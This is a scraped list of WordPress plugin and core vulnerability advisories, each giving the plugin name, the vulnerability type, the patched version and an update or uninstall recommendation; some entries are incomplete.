Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: YML for Yandex Market

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.10.8
Recommended Action: Update to version 3.10.8, or a newer patched version

Plugin: Media Usage

Plugin: NewStatPress

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 0.9.9
Recommended Action: Update to version 0.9.9, or a newer patched version

Plugin: Salon Booking System

Vulnerability: Sensitive Data Disclosure
Patched Version: 7.6.3
Recommended Action: Update to version 7.6.3, or a newer patched version

Plugin: LiteSpeed Cache

Vulnerability: Authorization Bypass
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: XML Sitemap Generator for Google

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: Short URL

Vulnerability: Missing Authorization via multiple AJAX functions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: tarteaucitron.js – Cookies legislation & GDPR

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Video Gallery – YouTube Gallery and Vimeo Gallery

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: Static Page eXtended

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Request Forgery leading to Post Thumbnail Change
Patched Version: 3.29
Recommended Action: Update to version 3.29, or a newer patched version

Plugin: Blackhole for Bad Bots

Vulnerability: Arbitrary IP Address Blocking via IP Spoofing
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: 3D Tag Cloud

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.9
Recommended Action: Update to version 3.9, or a newer patched version

Plugin: Good & Bad comments

Plugin: CMS Commander – Manage Multiple Sites

Vulnerability: PHP Object Injection
Patched Version: 2.22
Recommended Action: Update to version 2.22, or a newer patched version

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: VR Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: WP Power Stats

Plugin: Scroll Baner

Vulnerability: Cross-Site Request Forgery to Remote Code Execution and/or Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Scripts n Styles

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.5.4
Recommended Action: Update to version 3.5.4, or a newer patched version

Plugin: YDS Support Ticket System

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_toolbar_save_settings_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Comment License

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Custom Post Carousels with Owl

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: MainWP Dashboard: WordPress Management without the SaaS

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.5
Recommended Action: Update to version 4.2.5, or a newer patched version

Plugin: Creative Mail – Easier WordPress & WooCommerce Email Marketing

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Accordion

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan

Vulnerability: Cross-Site Request Forgery via antihacker_ajax_scan
Patched Version: 4.35
Recommended Action: Update to version 4.35, or a newer patched version

Plugin: Easy Property Listings

Vulnerability: Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Product Vendors

Vulnerability: Insecure Direct Object Reference to Vendor Commission Percentage Update
Patched Version: 2.1.69
Recommended Action: Update to version 2.1.69, or a newer patched version

Plugin: WooCommerce Login Redirect

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: Product Attachment for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Support Ticket System

Vulnerability: SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Duplicate Post

Vulnerability: Cross-Site Request Forgery via ‘cdp_action_handling’ AJAX action
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Scripting via wpFastestCachePage options, wpFastestCachePreload_number or wpFastestCacheLanguage parameter
Patched Version: 0.8.8.6
Recommended Action: Update to version 0.8.8.6, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.40
Recommended Action: Update to version 1.3.40, or a newer patched version

Plugin: WordPress IDX Real Estate Listings & MLS Search

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Authenticated (Admin+) Server-Side Request Forgery
Patched Version: 4.2.6
Recommended Action: Update to version 4.2.6, or a newer patched version

Plugin: iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more

Vulnerability: Authenticated (Subscriber+) Privilege Escalation
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: External Media

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 1.0.34
Recommended Action: Update to version 1.0.34, or a newer patched version

Plugin: Typebot | Create advanced chat experiences without coding

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: flickrRSS

Vulnerability: Cross-Site Scripting via flickrRSS_set
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes

Vulnerability: Insecure Direct Object Reference
Patched Version: 4.21.2
Recommended Action: Update to version 4.21.2, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated(Editor+) SQL Injection
Patched Version: 2.8.22
Recommended Action: Update to version 2.8.22, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting in post_oxi_settings function
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Shortcode Factory

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Google Analytics Opt-Out

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.9.4.1
Recommended Action: Update to version 0.9.4.1, or a newer patched version

Plugin: OneSignal – Web Push Notifications

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.17.8
Recommended Action: Update to version 1.17.8, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: WordPress Popular Posts

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.3.3
Recommended Action: Update to version 6.3.3, or a newer patched version

Plugin: Mautic Integration for WooCommerce

Vulnerability: Cross-Site Request Forgery leading to Arbitrary Options Update
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Modal Window – create popup modal window

Vulnerability: Cross-Site Request Forgery to Remote Code Execution
Patched Version: 5.2.2
Recommended Action: Update to version 5.2.2, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.6
Recommended Action: Update to version 6.4.6, or a newer patched version

Plugin: Product Vendors

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.77
Recommended Action: Update to version 2.1.77, or a newer patched version

Plugin: Yampi Checkout

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: SQL Injection
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: zingiri-web-shop

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Unauthenticated Parameter Manipulation
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Attachment Name
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: WDSocialWidgets

Plugin: Wr Age Verification

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Anywhere Flash Embed

Plugin: WP Discord Invite

Vulnerability: Reflected Cross-Site Scripting via webhook
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: GEO my WP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Augmented reality plugin

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Cross-Site Scripting
Patched Version: 4.27.4
Recommended Action: Update to version 4.27.4, or a newer patched version

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: 2.0.3
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Core: WordPress

Vulnerability: Authentication Cookie Forgery
Patched Version: 3.7.2
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.2, 3.8.2

Plugin: Co-Authors Plus

Vulnerability: 3.5.1
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: WP Popups – WordPress Popup builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.5.1
Recommended Action: Update to version 2.1.5.1, or a newer patched version

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 3.0.2.1
Recommended Action: Update to version 3.0.2.1, or a newer patched version

Plugin: Related Products for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.16
Recommended Action: Update to version 3.3.16, or a newer patched version

Plugin: PWA for WP & AMP

Vulnerability: Missing Authorization
Patched Version: 1.7.33
Recommended Action: Update to version 1.7.33, or a newer patched version

Plugin: Process Steps Template Designer

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Twenty20 Image Before-After

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery via process_bulk_action
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: Quttera Web Malware Scanner

Vulnerability: Authenticated (Administrator+) Directory Traversal via ShowFile
Patched Version: 3.4.2.1
Recommended Action: Update to version 3.4.2.1, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Contributor+) Arbitrary Content Deletion
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: Popular Brand Icons – Simple Icons

Vulnerability: Simple Icons <= 2.7.7
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: Don8

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.5.5
Recommended Action: Update to version 8.5.5, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: SQL Injection
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Super Testimonials

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Directory Traversal
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Injection Guard

Vulnerability: Missing Authorization to Whitelist Update
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Donations Made Easy – Smart Donations

Plugin: Original texts Yandex WebMaster

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: SQL Injection
Patched Version: 1.3.59
Recommended Action: Update to version 1.3.59, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Abandoned Cart Pro for WooCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 7.13.0
Recommended Action: Update to version 7.13.0, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.3.79
Recommended Action: Update to version 1.3.79, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Missing Authorization on AJAX actions
Patched Version: 4.9.1
Recommended Action: Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3

Plugin: WP-RecentComments

Vulnerability: SQL Injection
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: weForms – Easy Drag & Drop Contact Form Builder For WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.14
Recommended Action: Update to version 1.6.14, or a newer patched version

Plugin: Shop Page WP

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Booking Manager – Sync WP Booking Calendar – Import Events, Export Bookings to ICS Calendar

Vulnerability: Authenticated (Subscriber+) Server-Side Request Forgery
Patched Version: 2.0.29
Recommended Action: Update to version 2.0.29, or a newer patched version

Plugin: WP-Polls

Vulnerability: Cross-Site Scripting
Patched Version: 2.73.1
Recommended Action: Update to version 2.73.1, or a newer patched version

Plugin: Ko-fi Button

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Insert Special Characters

Vulnerability: Regular Expression Denial of Service (ReDoS)
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Event Expresso Free

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.1.37.14
Recommended Action: Update to one of the following versions, or a newer patched version: 3.1.37.14, 3.1.37.14L

Plugin: LiquidPoll – Polls, Surveys, NPS and Feedback Reviews

Vulnerability: Missing Authorization via activate_addon
Patched Version: 3.3.69
Recommended Action: Update to version 3.3.69, or a newer patched version

Plugin: InfiniteWP Client

Vulnerability: Authenticated (Subscriber+) Sensitive Information Exposure
Patched Version: 1.12.1
Recommended Action: Update to version 1.12.1, or a newer patched version

Plugin: Kopa Framework

Plugin: simple-flash-video

Plugin: WooCommerce GoCardless Gateway

Vulnerability: Unauthenticated Insecure Direct Object Reference
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: wppm

Plugin: Export Users to CSV

Vulnerability: CSV Injection
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Live Chat with Facebook Messenger

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Related Posts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Snazzy Maps

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: ReFlex Gallery » WordPress Photo Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Zedity – The Layout-Free Content Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Content Views – Post Grid & Filter, Recent Posts, Category Posts … (Shortcode, Blocks, and Elementor Widgets)

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Plugin: WP Popups – WordPress Popup builder

Vulnerability: Authenticated (Contributor+) Stored Cross Site Scripting via Shortcode
Patched Version: 2.1.4.8
Recommended Action: Update to version 2.1.4.8, or a newer patched version

Plugin: WordPress Knowledge base & Documentation Plugin – WP Knowledgebase

Plugin: Simple Download Counter

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Disqus Comment System

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 2.79
Recommended Action: Update to version 2.79, or a newer patched version

Plugin: WP Popup Banners

Vulnerability: Authenticated (Subscriber+) SQL Injection via ‘value’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce

Vulnerability: Authenticated (Contributor+) Arbitrary File Read
Patched Version: 2.0.7
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.7, 4.1.10

Plugin: MainWP iThemes Security Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Task Manager Pro – Task Management Plugin For WordPress

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.14
Recommended Action: Update to version 3.3.14, or a newer patched version

Plugin: WP资源下载管理

Plugin: Collapse-O-Matic

Core: WordPress

Vulnerability: No subtitle
Patched Version: 3.7.24
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.24, 3.8.24, 3.9.22, 4.0.21, 4.1.21, 4.2.18, 4.3.14, 4.4.13, 4.5.12, 4.6.9, 4.7.8, 4.8.4, 4.9.1

Plugin: Caldera Forms – More Than Contact Forms

Vulnerability: Cross Site Scripting
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: eShop

Vulnerability: Multiple SQL Injections
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quick Subscribe

Vulnerability: Cross-Site Request Forgery to Arbitrary Settings Update and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: DELUCKS SEO

Vulnerability: Stored Cross Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: MapPress Maps for WordPress

Vulnerability: Authenticated (Contributor+) SQL Injection via get_maps
Patched Version: 2.85.5
Recommended Action: Update to version 2.85.5, or a newer patched version

Plugin: All in One B2B for WooCommerce

Plugin: JS Multi Hotel

Plugin: Bulk change of posts terms and post types

Plugin: RSVP Events

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: Project Status

Plugin: WP Code Highlight.js

Plugin: Mail Masta

Vulnerability: SQL Injection via camp_id parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Videos on Admin Dashboard

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Google Analytics 4 (GA4), Google Ads, Meta Pixel, GTM & Multiple Pixels for Woocommerce & WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Unauthenticated Stored Cross-Site Scripting via ’email’
Patched Version: 10.6.6
Recommended Action: Update to version 10.6.6, or a newer patched version

Plugin: Variation Images Gallery for WooCommerce

Vulnerability: Reflected Cross-Site Scripting via style
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: No subtitle
Patched Version: 1.22.9
Recommended Action: Update to version 1.22.9, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 1.0.94
Recommended Action: Update to version 1.0.94, or a newer patched version

Plugin: Taboola

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 20.2
Recommended Action: Update to version 20.2, or a newer patched version

Plugin: Dean’s Permalinks Migration

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: CSV Injection
Patched Version: 7.7.2
Recommended Action: Update to version 7.7.2, or a newer patched version

Plugin: Orange Form

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Scripting via wpglobus_option[enabled_languages]
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: MainWP Rocket Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: cformsII

Vulnerability: Cross-Site Scripting
Patched Version: 14.13.3
Recommended Action: Update to version 14.13.3, or a newer patched version

Plugin: Daily Prayer Time

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2022.03.01
Recommended Action: Update to version 2022.03.01, or a newer patched version

Plugin: WP Frontend Profile

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Coupon Creator

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Stored Cross-Site Scripting
Patched Version: 8.0.06
Recommended Action: Update to version 8.0.06, or a newer patched version

Plugin: Email Address Encoder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.23
Recommended Action: Update to version 1.0.23, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 5.8.6
Recommended Action: Update to version 5.8.6, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Product Deletion
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Social Share Buttons by Supsystic

Vulnerability: Missing Authorization
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.7.18
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.18, 3.8.18, 3.9.16, 4.0.15, 4.1.15, 4.2.12, 4.3.8, 4.4.7, 4.5.6, 4.6.3, 4.7.2

Plugin: WP Review Slider

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 12.2
Recommended Action: Update to version 12.2, or a newer patched version

Plugin: WordPress Amazon S3 Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Church Admin

Vulnerability: Cross-Site Request Forgery leading to Plugin Backup Disclosure
Patched Version: 3.4.135
Recommended Action: Update to version 3.4.135, or a newer patched version

Plugin: WordPress Contact Forms by Cimatti

Vulnerability: Cross-Site Request Forgery via accua_forms_list_page_table
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: SSL Mixed Content Fix

Vulnerability: Cross-Site Request Forgery on handle_installation function
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Live updates from Excel

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: SparkPost

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: Simple Social Media Share Buttons – Social Sharing for Everyone

Vulnerability: Unauthenticated Password Protected Post Disclosure
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Download Plugins and Themes in ZIP from Dashboard

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: WCP OpenWeather

Plugin: Timetable and Event Schedule by MotoPress

Vulnerability: Unauthorised Event TimeSlot Update
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Authenticated Arbitrary Post Deletion
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: SpeedyCache – Cache, Optimization, Performance

Vulnerability: Authenticated (Subscriber+) Server-Side Request Forgery
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Localize Remote Images

Vulnerability: Cross-Site Request Forgery via admin menu
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SpeakOut! Email Petitions

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.14.15.1
Recommended Action: Update to version 2.14.15.1, or a newer patched version

Plugin: LabTools

Plugin: MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder

Vulnerability: Open Redirect
Patched Version: 4.0.9.4
Recommended Action: Update to version 4.0.9.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Widget Title
Patched Version: 3.7.10
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.10, 3.8.10, 3.9.8, 4.0.7, 4.1.7, 4.2.4

Plugin: Pods – Custom Content Types and Fields

Vulnerability: 2.7.26
Patched Version: 2.7.27
Recommended Action: Update to version 2.7.27, or a newer patched version

Plugin: Connect Matomo (WP-Matomo, WP-Piwik)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.27
Recommended Action: Update to version 1.0.27, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Missing Authorization to Plugin Installation, Settings Change/Delete, Demo Import, Directory Kit Deletion via wdk_public_action
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Aspose Cloud eBook Generator (Discontinued)

Vulnerability: Directory Traversal
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Easy Media Replace

Vulnerability: Authenticated (Author+) Arbitrary File Deletion
Patched Version: 0.2.0
Recommended Action: Update to version 0.2.0, or a newer patched version

Plugin: Master Addons – Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Greenshift – animation and page builder blocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

